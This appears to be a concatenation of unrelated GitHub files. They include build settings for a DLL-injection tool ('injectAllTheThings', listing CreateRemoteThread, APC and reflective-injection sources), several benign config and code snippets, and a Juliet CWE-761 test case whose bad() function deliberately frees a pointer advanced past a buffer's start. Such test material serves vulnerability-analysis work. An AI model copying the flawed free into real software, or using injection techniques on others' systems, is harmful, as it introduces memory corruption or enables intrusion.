<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<PostBuildEvent>
<Command>copy ..\Debug\injectAllTheThings.exe ..\bin\injectAllTheThings_32.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;WIN_X64;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<PostBuildEvent>
<Command>copy ..\x64\Debug\injectAllTheThings.exe ..\bin\injectAllTheThings_64.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<PostBuildEvent>
<Command>copy ..\Release\injectAllTheThings.exe ..\bin\injectAllTheThings_32.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;WIN_X64;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<PostBuildEvent>
<Command>copy ..\x64\Release\injectAllTheThings.exe ..\bin\injectAllTheThings_64.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="auxiliary.cpp" />
<ClCompile Include="GetProcAddressR.c" />
<ClCompile Include="LoadLibraryR.c" />
<ClCompile Include="main.cpp" />
<ClCompile Include="t_CreateRemoteThread.cpp" />
<ClCompile Include="t_NtCreateThreadEx.cpp" />
<ClCompile Include="t_QueueUserAPC.cpp" />
<ClCompile Include="t_ReflectiveDllInjection.cpp" />
<ClCompile Include="t_RtlCreateUserThread.cpp" />
<ClCompile Include="t_SetWindowsHookEx.cpp" />
<ClCompile Include="t_suspendInjectResume.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="auxiliary.h" />
<ClInclude Include="fheaders.h" />
<ClInclude Include="GetProcAddressR.h" />
<ClInclude Include="LoadLibraryR.h" />
<ClInclude Include="ReflectiveDLLInjection.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project> | {
"pile_set_name": "Github"
} |
Welcome, authenticated client
<form name="input" action="/ferrum/post_basic_auth" method="post">
<input type="submit" value="Submit">
</form>
| {
"pile_set_name": "Github"
} |
'use strict';
Object.defineProperty(exports, '__esModule', { value: true });
var prefix = 'fab';
var iconName = 'aws';
var width = 640;
var height = 512;
var ligatures = [];
var unicode = 'f375';
var svgPathData = 'M180.41 203.01c-.72 22.65 10.6 32.68 10.88 39.05a8.164 8.164 0 0 1-4.1 6.27l-12.8 8.96a10.66 10.66 0 0 1-5.63 1.92c-.43-.02-8.19 1.83-20.48-25.61a78.608 78.608 0 0 1-62.61 29.45c-16.28.89-60.4-9.24-58.13-56.21-1.59-38.28 34.06-62.06 70.93-60.05 7.1.02 21.6.37 46.99 6.27v-15.62c2.69-26.46-14.7-46.99-44.81-43.91-2.4.01-19.4-.5-45.84 10.11-7.36 3.38-8.3 2.82-10.75 2.82-7.41 0-4.36-21.48-2.94-24.2 5.21-6.4 35.86-18.35 65.94-18.18a76.857 76.857 0 0 1 55.69 17.28 70.285 70.285 0 0 1 17.67 52.36l-.01 69.29zM93.99 235.4c32.43-.47 46.16-19.97 49.29-30.47 2.46-10.05 2.05-16.41 2.05-27.4-9.67-2.32-23.59-4.85-39.56-4.87-15.15-1.14-42.82 5.63-41.74 32.26-1.24 16.79 11.12 31.4 29.96 30.48zm170.92 23.05c-7.86.72-11.52-4.86-12.68-10.37l-49.8-164.65c-.97-2.78-1.61-5.65-1.92-8.58a4.61 4.61 0 0 1 3.86-5.25c.24-.04-2.13 0 22.25 0 8.78-.88 11.64 6.03 12.55 10.37l35.72 140.83 33.16-140.83c.53-3.22 2.94-11.07 12.8-10.24h17.16c2.17-.18 11.11-.5 12.68 10.37l33.42 142.63L420.98 80.1c.48-2.18 2.72-11.37 12.68-10.37h19.72c.85-.13 6.15-.81 5.25 8.58-.43 1.85 3.41-10.66-52.75 169.9-1.15 5.51-4.82 11.09-12.68 10.37h-18.69c-10.94 1.15-12.51-9.66-12.68-10.75L328.67 110.7l-32.78 136.99c-.16 1.09-1.73 11.9-12.68 10.75h-18.3zm273.48 5.63c-5.88.01-33.92-.3-57.36-12.29a12.802 12.802 0 0 1-7.81-11.91v-10.75c0-8.45 6.2-6.9 8.83-5.89 10.04 4.06 16.48 7.14 28.81 9.6 36.65 7.53 52.77-2.3 56.72-4.48 13.15-7.81 14.19-25.68 5.25-34.95-10.48-8.79-15.48-9.12-53.13-21-4.64-1.29-43.7-13.61-43.79-52.36-.61-28.24 25.05-56.18 69.52-55.95 12.67-.01 46.43 4.13 55.57 15.62 1.35 2.09 2.02 4.55 1.92 7.04v10.11c0 4.44-1.62 6.66-4.87 6.66-7.71-.86-21.39-11.17-49.16-10.75-6.89-.36-39.89.91-38.41 24.97-.43 18.96 26.61 26.07 29.7 26.89 36.46 10.97 48.65 12.79 63.12 29.58 17.14 22.25 7.9 48.3 4.35 55.44-19.08 37.49-68.42 34.44-69.26 34.42zm40.2 104.86c-70.03 51.72-171.69 79.25-258.49 79.25A469.127 469.127 0 0 1 2.83 327.46c-6.53-5.89-.77-13.96 7.17-9.47a637.37 637.37 0 0 0 316.88 84.12 630.22 630.22 0 0 0 241.59-49.55c11.78-5 21.77 7.8 10.12 16.38zm29.19-33.29c-8.96-11.52-59.28-5.38-81.81-2.69-6.79.77-7.94-5.12-1.79-9.47 40.07-28.17 105.88-20.1 113.44-10.63 7.55 9.47-2.05 75.41-39.56 106.91-5.76 4.87-11.27 2.3-8.71-4.1 8.44-21.25 27.39-68.49 18.43-80.02z';
exports.definition = {
prefix: prefix,
iconName: iconName,
icon: [
width,
height,
ligatures,
unicode,
svgPathData
]};
exports.faAws = exports.definition;
exports.prefix = prefix;
exports.iconName = iconName;
exports.width = width;
exports.height = height;
exports.ligatures = ligatures;
exports.unicode = unicode;
exports.svgPathData = svgPathData; | {
"pile_set_name": "Github"
} |
<HTML>
<HEAD>
<meta charset="UTF-8">
<title>KhaiiiLoggerType.Word - koalanlp</title>
<link rel="stylesheet" href="../../../style.css">
</HEAD>
<BODY>
<a href="../../index.html">koalanlp</a> / <a href="../index.html">kr.bydelta.koala.khaiii</a> / <a href="index.html">KhaiiiLoggerType</a> / <a href="./-word.html">Word</a><br/>
<br/>
<h1>Word</h1>
<a name="kr.bydelta.koala.khaiii.KhaiiiLoggerType.Word"></a>
<code><span class="identifier">Word</span></code> <a href="https://github.com/koalanlp/koalanlp/blob/master/khaiii/src/main/kotlin/kr/bydelta/koala/khaiii/ext.kt#L137">(source)</a>
<p>어절 구성</p>
</BODY>
</HTML>
| {
"pile_set_name": "Github"
} |
# Default configuration for ppc64-softmmu
# Include all 32-bit boards
include ppc-softmmu.mak
# For PowerNV
CONFIG_POWERNV=y
CONFIG_IPMI=y
CONFIG_IPMI_LOCAL=y
CONFIG_IPMI_EXTERN=y
CONFIG_ISA_IPMI_BT=y
# For pSeries
CONFIG_PSERIES=y
CONFIG_VIRTIO_VGA=y
CONFIG_XICS=$(CONFIG_PSERIES)
CONFIG_XICS_SPAPR=$(CONFIG_PSERIES)
CONFIG_XICS_KVM=$(call land,$(CONFIG_PSERIES),$(CONFIG_KVM))
CONFIG_MEM_DEVICE=y
CONFIG_DIMM=y
CONFIG_SPAPR_RNG=y
| {
"pile_set_name": "Github"
} |
namespace Exercism.CSharp.Exercises.Generators
{
public class Pangram : GeneratorExercise
{
}
} | {
"pile_set_name": "Github"
} |
/* Generated by RuntimeBrowser
Image: /System/Library/PrivateFrameworks/StoreKitUI.framework/StoreKitUI
*/
@interface _SKUIModalSheetNavigationController : UINavigationController
- (struct CGSize { double x1; double x2; })sizeForChildContentContainer:(id)arg1 withParentContainerSize:(struct CGSize { double x1; double x2; })arg2;
@end
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
<array name="sina_video_videoview_layers">
<item>@layout/control_layer</item>
</array>
<!-- 新的结构 -->
<array name="sv_videoview_layers">
<item>@array/sv_videoview_layer_controllayer</item>
</array>
<!-- 一组竖屏+横屏 -->
<array name="sv_videoview_layer_controllayer">
<item>@layout/control_layer</item>
<item>@layout/control_layer_horizon</item>
</array>
</resources> | {
"pile_set_name": "Github"
} |
/*
COPYRIGHT STATUS:
Dec 1st 2001, Fermi National Accelerator Laboratory (FNAL) documents and
software are sponsored by the U.S. Department of Energy under Contract No.
DE-AC02-76CH03000. Therefore, the U.S. Government retains a world-wide
non-exclusive, royalty-free license to publish or reproduce these documents
and software for U.S. Government purposes. All documents and software
available from this server are protected under the U.S. and Foreign
Copyright Laws, and FNAL reserves all rights.
Distribution of the software available from this server is free of
charge subject to the user following the terms of the Fermitools
Software Legal Information.
Redistribution and/or modification of the software shall be accompanied
by the Fermitools Software Legal Information (including the copyright
notice).
The user is asked to feed back problems, benefits, and/or suggestions
about the software to the Fermilab Software Providers.
Neither the name of Fermilab, the URA, nor the names of the contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
DISCLAIMER OF LIABILITY (BSD):
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL FERMILAB,
OR THE URA, OR THE U.S. DEPARTMENT of ENERGY, OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Liabilities of the Government:
This software is provided by URA, independent from its Prime Contract
with the U.S. Department of Energy. URA is acting independently from
the Government and in its own private capacity and is not acting on
behalf of the U.S. Government, nor as its contractor nor its agent.
Correspondingly, it is understood and agreed that the U.S. Government
has no connection to this software and in no manner whatsoever shall
be liable for nor assume any responsibility or obligation for any claim,
cost, or damages arising out of or resulting from the use of the software
available from this server.
Export Control:
All documents and software available from this server are subject to U.S.
export control laws. Anyone downloading information from this server is
obligated to secure any necessary Government licenses before exporting
documents or software obtained from this server.
*/
package org.dcache.vehicles.alarms;
import java.util.List;
import diskCacheV111.vehicles.Message;
import org.dcache.alarms.LogEntry;
import org.dcache.util.FieldSort;
/**
* <p>Request for list of alarms filtered by date range and/or type.</p>
*/
public class AlarmsRequestMessage extends Message {
private Long limit;
private Long offset;
private Long before;
private Long after;
private String type;
private Boolean includeClosed;
private String severity;
private String host;
private String domain;
private String service;
private String info;
private List<FieldSort> sort;
private List<LogEntry> alarms;
public Long getAfter() {
return after;
}
public List<LogEntry> getAlarms() {
return alarms;
}
public Long getBefore() {
return before;
}
public String getDomain() {
return domain;
}
public String getHost() {
return host;
}
public Boolean getIncludeClosed() {
return includeClosed;
}
public String getInfo() {
return info;
}
public Long getLimit() {
return limit;
}
public Long getOffset() {
return offset;
}
public String getService() {
return service;
}
public String getSeverity() {
return severity;
}
public List<FieldSort> getSort() {
return sort;
}
public String getType() {
return type;
}
public void setAfter(Long after) {
this.after = after;
}
public void setAlarms(List<LogEntry> alarms) {
this.alarms = alarms;
}
public void setBefore(Long before) {
this.before = before;
}
public void setDomain(String domain) {
this.domain = domain;
}
public void setHost(String host) {
this.host = host;
}
public void setIncludeClosed(Boolean includeClosed) {
this.includeClosed = includeClosed;
}
public void setInfo(String info) {
this.info = info;
}
public void setLimit(Long limit) {
this.limit = limit;
}
public void setOffset(Long offset) {
this.offset = offset;
}
public void setService(String service) {
this.service = service;
}
public void setSeverity(String severity) {
this.severity = severity;
}
public void setSort(List<FieldSort> sort) {
this.sort = sort;
}
public void setType(String type) {
this.type = type;
}
}
| {
"pile_set_name": "Github"
} |
// <auto-generated>
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See License.txt in the project root for
// license information.
//
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is
// regenerated.
// </auto-generated>
namespace Microsoft.Bot.Connector
{
using Microsoft.Rest;
using Microsoft.Bot.Schema;
using System.Collections;
using System.Collections.Generic;
using System.Threading;
using System.Threading.Tasks;
/// <summary>
/// BotSignIn operations.
/// </summary>
public partial interface IBotSignIn
{
/// <param name='state'>
/// </param>
/// <param name='codeChallenge'>
/// </param>
/// <param name='emulatorUrl'>
/// </param>
/// <param name='finalRedirect'>
/// </param>
/// <param name='customHeaders'>
/// The headers that will be added to request.
/// </param>
/// <param name='cancellationToken'>
/// The cancellation token.
/// </param>
/// <exception cref="Microsoft.Rest.HttpOperationException">
/// Thrown when the operation returned an invalid status code
/// </exception>
/// <exception cref="Microsoft.Rest.SerializationException">
/// Thrown when unable to deserialize the response
/// </exception>
/// <exception cref="Microsoft.Rest.ValidationException">
/// Thrown when a required parameter is null
/// </exception>
Task<HttpOperationResponse<string>> GetSignInUrlWithHttpMessagesAsync(string state, string codeChallenge = default(string), string emulatorUrl = default(string), string finalRedirect = default(string), Dictionary<string, List<string>> customHeaders = null, CancellationToken cancellationToken = default(CancellationToken));
}
}
| {
"pile_set_name": "Github"
} |
{
"ver": "1.0.8",
"uuid": "f8380bfd-2c7e-4fde-95c3-dfc319499d9d",
"isPlugin": false,
"loadPluginInWeb": true,
"loadPluginInNative": true,
"loadPluginInEditor": false,
"subMetas": {}
} | {
"pile_set_name": "Github"
} |
# Copyright 2019 Google, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START vision_product_search_purge_products_in_product_set]
require "google/cloud/vision"
# Delete all products in a product set.
def product_search_purge_products_in_product_set \
project_id = "your-project-id",
location = "us-west1",
product_set_id = "your-product-set-id"
client = Google::Cloud::Vision.product_search
parent = client.location_path project: project_id, location: location
config = {
product_set_id: product_set_id
}
# The operation is irreversible and removes multiple products.
# The user is required to pass in force=true to actually perform the purge.
# If force is not set to true, the service raises an exception.
force = true
# The purge operation is async.
operation = client.purge_products parent: parent,
product_set_purge_config: config,
force: force
puts "Processing operation name: #{operation.name}"
operation.wait_until_done! # Waits for the operation to complete
puts "Products in product set #{product_set_id} deleted."
end
# [END vision_product_search_purge_products_in_product_set]
product_search_purge_products_in_product_set(*ARGV) if $PROGRAM_NAME == __FILE__
| {
"pile_set_name": "Github"
} |
--require("compat-5.1")
System=luanet.System
WebClient=System.Net.WebClient
StreamReader=System.IO.StreamReader
Math=System.Math
print(Math:Pow(2,3))
myWebClient = WebClient()
myStream = myWebClient:OpenRead(arg[1])
sr = StreamReader(myStream)
line=sr:ReadLine()
repeat
print(line)
line=sr:ReadLine()
until not line
myStream:Close()
| {
"pile_set_name": "Github"
} |
/*
Convert Exchange appointments and meetings to ICAL files
OpenChange Project
Copyright (C) Julien Kerihuel 2008
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "libexchange2ical/libexchange2ical.h"
static void getRange(const char *range, struct tm *start, struct tm *end)
{
char *startString;
char *endString;
startString = strtok((char *) range, "-");
endString = strtok(NULL, "-");
end->tm_mon = atoi(strtok(endString, "/"))-1;
end->tm_mday = atoi(strtok(NULL, "/"));
end->tm_year = atoi(strtok(NULL, "/"))-1900;
end->tm_min = 0;
end->tm_hour = 0;
end->tm_sec = 0;
start->tm_mon = atoi(strtok(startString, "/"))-1;
start->tm_mday = atoi(strtok(NULL, "/"));
start->tm_year = atoi(strtok(NULL, "/"))-1900;
start->tm_min = 0;
start->tm_hour = 0;
start->tm_sec = 0;
return;
}
static char* read_stream(char *s, size_t size, void *d)
{
char *c = fgets(s, size, (FILE*)d);
return c;
}
int main(int argc, const char *argv[])
{
enum MAPISTATUS retval;
poptContext pc;
int opt;
mapi_object_t obj_store;
mapi_object_t obj_folder;
const char *opt_profdb = NULL;
const char *opt_profname = NULL;
const char *opt_password = NULL;
const char *opt_debug = NULL;
const char *opt_filename = NULL;
const char *opt_icalsync = NULL;
const char *opt_range = NULL;
bool opt_dumpdata = false;
FILE *fp = NULL;
mapi_id_t fid;
struct mapi_context *mapi_ctx;
struct mapi_session *session = NULL;
icalcomponent *vcal;
struct tm start;
struct tm end;
icalparser *parser;
icalcomponent *ical;
icalcomponent *vevent;
TALLOC_CTX *mem_ctx;
enum { OPT_PROFILE_DB=1000, OPT_PROFILE, OPT_PASSWORD, OPT_DEBUG, OPT_DUMPDATA, OPT_FILENAME, OPT_RANGE, OPT_ICALSYNC };
struct poptOption long_options[] = {
POPT_AUTOHELP
{ "database", 'f', POPT_ARG_STRING, NULL, OPT_PROFILE_DB, "set the profile database path", NULL },
{ "profile", 'p', POPT_ARG_STRING, NULL, OPT_PROFILE, "set the profile name", NULL },
{ "password", 'P', POPT_ARG_STRING, NULL, OPT_PASSWORD, "set the profile password", NULL },
{ "icalsync", 'i', POPT_ARG_STRING, NULL, OPT_ICALSYNC, "set the icalendar to convert to exchange", NULL },
{ "filename", 'o', POPT_ARG_STRING, NULL, OPT_FILENAME, "set the output iCalendar filename", NULL },
{ "range", 'R', POPT_ARG_STRING, NULL, OPT_RANGE, "set the range of accepted start dates", NULL },
{ "debuglevel", 'd', POPT_ARG_STRING, NULL, OPT_DEBUG, "set the debug level", NULL },
{ "dump-data", 0, POPT_ARG_NONE, NULL, OPT_DUMPDATA, "dump the hex data", NULL },
POPT_OPENCHANGE_VERSION
{ NULL, 0, 0, NULL, 0, NULL, NULL }
};
pc = poptGetContext("exchange2ical", argc, argv, long_options, 0);
while ((opt = poptGetNextOpt(pc)) != -1) {
switch (opt) {
case OPT_PROFILE_DB:
opt_profdb = poptGetOptArg(pc);
break;
case OPT_FILENAME:
opt_filename = poptGetOptArg(pc);
break;
case OPT_ICALSYNC:
opt_icalsync = poptGetOptArg(pc);
break;
case OPT_RANGE:
opt_range = poptGetOptArg(pc);
break;
case OPT_PROFILE:
opt_profname = poptGetOptArg(pc);
break;
case OPT_PASSWORD:
opt_password = poptGetOptArg(pc);
break;
case OPT_DEBUG:
opt_debug = poptGetOptArg(pc);
break;
case OPT_DUMPDATA:
opt_dumpdata = true;
break;
}
}
mem_ctx = talloc_named(NULL, 0, "exchange2ical_tool");
/* Sanity Checks */
if (!opt_profdb) {
opt_profdb = talloc_asprintf(mem_ctx, DEFAULT_PROFDB, getenv("HOME"));
}
/* Initialize MAPI subsystem */
retval = MAPIInitialize(&mapi_ctx, opt_profdb);
if (retval != MAPI_E_SUCCESS) {
mapi_errstr("MAPIInitialize", GetLastError());
return 1;
}
/* debug options */
if (opt_debug) {
SetMAPIDebugLevel(mapi_ctx, atoi(opt_debug));
}
SetMAPIDumpData(mapi_ctx, opt_dumpdata);
session = octool_init_mapi(mapi_ctx, opt_profname, opt_password, 0);
if(!session){
mapi_errstr("Session", GetLastError());
return 1;
}
/* Open Mailbox */
mapi_object_init(&obj_store);
retval = OpenMsgStore(session, &obj_store);
if (retval != MAPI_E_SUCCESS) {
mapi_errstr("OpenMsgStore", GetLastError());
return 1;
}
/* Get default calendar folder */
retval = GetDefaultFolder(&obj_store, &fid, olFolderCalendar);
if (retval != MAPI_E_SUCCESS) {
mapi_errstr("GetDefaultFolder", GetLastError());
return 1;
}
/* Open default calendar folder */
mapi_object_init(&obj_folder);
retval = OpenFolder(&obj_store, fid, &obj_folder);
if (retval != MAPI_E_SUCCESS) {
mapi_errstr("OpenFolder", GetLastError());
return 1;
}
/*Ical2exchange*/
if(opt_icalsync){
if ((fp = fopen(opt_icalsync, "r")) == NULL) {
perror("Can not open Icalendar file");
} else {
parser = icalparser_new();
icalparser_set_gen_data(parser,fp);
ical = icalparser_parse(parser, read_stream);
printf("\n\nICAL file:\n%s\n", icalcomponent_as_ical_string(ical));
icalcomponent_strip_errors(ical);
vevent = icalcomponent_get_first_component(ical, ICAL_VEVENT_COMPONENT);
while(vevent){
_IcalEvent2Exchange(&obj_folder, vevent);
vevent = icalcomponent_get_next_component(ical, ICAL_VEVENT_COMPONENT);
}
icalcomponent_free(ical);
icalparser_free(parser);
fclose(fp);
fp = NULL;
}
}
if(opt_range){
getRange(opt_range, &start, &end);
vcal = Exchange2IcalRange(&obj_folder, &start, &end);
} else {
vcal = Exchange2Ical(&obj_folder);
}
if(vcal){
/* Icalendar save or print to console */
char *cal = icalcomponent_as_ical_string(vcal);
if (!opt_filename) {
printf("\n\nICAL file:\n%s\n", cal);
} else {
size_t bytesWritten;
if ((fp = fopen(opt_filename, "w")) == NULL) {
perror("fopen");
exit (1);
}
bytesWritten = fwrite(cal, strlen(cal), 1, fp);
if (bytesWritten < 1) {
printf("BOGUS write length: %zi", bytesWritten);
}
fclose(fp);
}
free(cal);
icalcomponent_free(vcal);
}
poptFreeContext(pc);
mapi_object_release(&obj_folder);
mapi_object_release(&obj_store);
MAPIUninitialize(mapi_ctx);
talloc_free(mem_ctx);
return 0;
}
| {
"pile_set_name": "Github"
} |
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08.c
Label Definition File: CWE761_Free_Pointer_Not_at_Start_of_Buffer.label.xml
Template File: source-sinks-08.tmpl.c
*/
/*
* @description
* CWE: 761 Free Pointer not at Start of Buffer
* BadSource: environment Read input from an environment variable
* Sinks:
* GoodSink: free() memory correctly at the start of the buffer
* BadSink : free() memory not at the start of the buffer
* Flow Variant: 08 Control flow: if(staticReturnsTrue()) and if(staticReturnsFalse())
*
* */
#include "std_testcase.h"
#include <wchar.h>
#define ENV_VARIABLE "ADD"
#ifdef _WIN32
#define GETENV getenv
#else
#define GETENV getenv
#endif
#define SEARCH_CHAR 'S'
/* The two function below always return the same value, so a tool
should be able to identify that calls to the functions will always
return a fixed value. */
static int staticReturnsTrue()
{
return 1;
}
static int staticReturnsFalse()
{
return 0;
}
#ifndef OMITBAD
void CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08_bad()
{
char * data;
data = (char *)malloc(100*sizeof(char));
data[0] = '\0';
{
/* Append input from an environment variable to data */
size_t dataLen = strlen(data);
char * environment = GETENV(ENV_VARIABLE);
/* If there is data in the environment variable */
if (environment != NULL)
{
/* POTENTIAL FLAW: Read data from an environment variable */
strncat(data+dataLen, environment, 100-dataLen-1);
}
}
if(staticReturnsTrue())
{
/* FLAW: We are incrementing the pointer in the loop - this will cause us to free the
* memory block not at the start of the buffer */
for (; *data != '\0'; data++)
{
if (*data == SEARCH_CHAR)
{
printLine("We have a match!");
break;
}
}
free(data);
}
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* goodB2G1() - use badsource and goodsink by changing staticReturnsTrue() to staticReturnsFalse() */
static void goodB2G1()
{
char * data;
data = (char *)malloc(100*sizeof(char));
data[0] = '\0';
{
/* Append input from an environment variable to data */
size_t dataLen = strlen(data);
char * environment = GETENV(ENV_VARIABLE);
/* If there is data in the environment variable */
if (environment != NULL)
{
/* POTENTIAL FLAW: Read data from an environment variable */
strncat(data+dataLen, environment, 100-dataLen-1);
}
}
if(staticReturnsFalse())
{
/* INCIDENTAL: CWE 561 Dead Code, the code below will never run */
printLine("Benign, fixed string");
}
else
{
{
size_t i;
/* FIX: Use a loop variable to traverse through the string pointed to by data */
for (i=0; i < strlen(data); i++)
{
if (data[i] == SEARCH_CHAR)
{
printLine("We have a match!");
break;
}
}
free(data);
}
}
}
/* goodB2G2() - use badsource and goodsink by reversing statements in if */
static void goodB2G2()
{
char * data;
data = (char *)malloc(100*sizeof(char));
data[0] = '\0';
{
/* Append input from an environment variable to data */
size_t dataLen = strlen(data);
char * environment = GETENV(ENV_VARIABLE);
/* If there is data in the environment variable */
if (environment != NULL)
{
/* POTENTIAL FLAW: Read data from an environment variable */
strncat(data+dataLen, environment, 100-dataLen-1);
}
}
if(staticReturnsTrue())
{
{
size_t i;
/* FIX: Use a loop variable to traverse through the string pointed to by data */
for (i=0; i < strlen(data); i++)
{
if (data[i] == SEARCH_CHAR)
{
printLine("We have a match!");
break;
}
}
free(data);
}
}
}
void CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08_good()
{
goodB2G1();
goodB2G2();
}
#endif /* OMITGOOD */
/* Below is the main(). It is only used when building this testcase on
its own for testing or for building a binary to use in testing binary
analysis tools. It is not used when compiling all the testcases as one
application, which is how source code analysis tools are tested. */
